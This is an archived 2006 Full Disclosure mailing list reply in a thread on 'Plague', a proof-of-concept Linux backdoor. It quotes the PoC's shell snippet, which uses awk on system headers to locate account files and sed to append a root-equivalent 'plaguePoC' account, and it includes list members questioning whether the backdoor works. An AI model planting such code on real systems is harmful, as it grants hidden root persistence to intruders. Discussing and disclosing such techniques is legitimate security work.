Full Disclosure mailing list archives
Re: Plague Proof of Concept Linux backdoor
From: <cdejrhymeswithgay () hush com>
Date: Sun, 22 Oct 2006 17:24:11 -0500
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Sun, 22 Oct 2006 06:29:35 -0500 hijacker () oldum net wrote:
even if they have ssh access, there is still nothing they can do, except to create two files in there $HOME directories containing expressions from paths.h and sysexits.h ? Why would that be considered a backdoor? Regards, -Nikolay KichukovOn 10/22/06, J. Oquendo <sil () infiltrated net> wrote:Plague is an odd proof of concept backdoor keeping tool based on the premise of using existing system files and commands to keep and maintain a backdoor on Linux systems. I could have modified this for BSD, Solaris, etc., but I didn't feel like doing the work... http://www.infiltrated.net/plague(from the link) if [ -e /usr/include/paths.h ] then file=`awk 'NR==59 {gsub(/"/,"");print $3}'/usr/include/paths.h`sed -n '1p' $file|sed 's/root/plaguePoC/g' >> $file file2=`awk 'NR==74 {print $8}' /usr/include/sysexits.h` sed -n '1p' $file2|sed 's/root/plaguePoC/g' >> $file2 fi -------------------------------- So this backdoor wouldnt work remotely, correct? You would needto addthe user to the people allowed to ssh in, and poke a hole forssh inthe firewall./? -JP _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
You said "there" when it should be "their." -----BEGIN PGP SIGNATURE----- Note: This signature can be verified at https://www.hushtools.com/verify Version: Hush 2.5 wpwEAQECAAYFAkU774sACgkQsGS6s78KOsX/dwP/YYZ+8XEB8KftGfWAxk2K0HT5HC4h 32eKy54hDbpjklVxZnjaAKrm6kNLkKfNMITDfOb+2+QLbWRAV6oPytZxuZQj0zg8Ky2w Xzk0hx0hZN5PsuGxESKLBTOLIkg9tsVDMDkPlc4eqyzewqbJgIXbcXw2UyV03welX7Ty HI1y+dw= =lSSF -----END PGP SIGNATURE----- Concerned about your privacy? Instantly send FREE secure email, no account required http://www.hushmail.com/send?l=480 Get the best prices on SSL certificates from Hushmail https://www.hushssl.com?l=485 _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Plague Proof of Concept Linux backdoor J. Oquendo (Oct 21)
- Re: Plague Proof of Concept Linux backdoor Dude VanWinkle (Oct 22)
- Re: Plague Proof of Concept Linux backdoor hijacker (Oct 22)
- Re: Plague Proof of Concept Linux backdoor Andrew Farmer (Oct 22)
- Re: Plague Proof of Concept Linux backdoor hijacker (Oct 23)
- Re: Plague Proof of Concept Linux backdoor Rik Bobbaers (Oct 23)
- Re: Plague Proof of Concept Linux backdoor hijacker (Oct 23)
- Re: Plague Proof of Concept Linux backdoor Rik Bobbaers (Oct 23)
- Re: Plague Proof of Concept Linux backdoor hijacker (Oct 22)
- Re: Plague Proof of Concept Linux backdoor Dude VanWinkle (Oct 22)
- <Possible follow-ups>
- Re: Plague Proof of Concept Linux backdoor cdejrhymeswithgay (Oct 22)
- Re: Plague Proof of Concept Linux backdoor Dude VanWinkle (Oct 22)
- Re: Plague Proof of Concept Linux backdoor daylasoul (Oct 22)
- Re: Plague Proof of Concept Linux backdoor virus (Oct 23)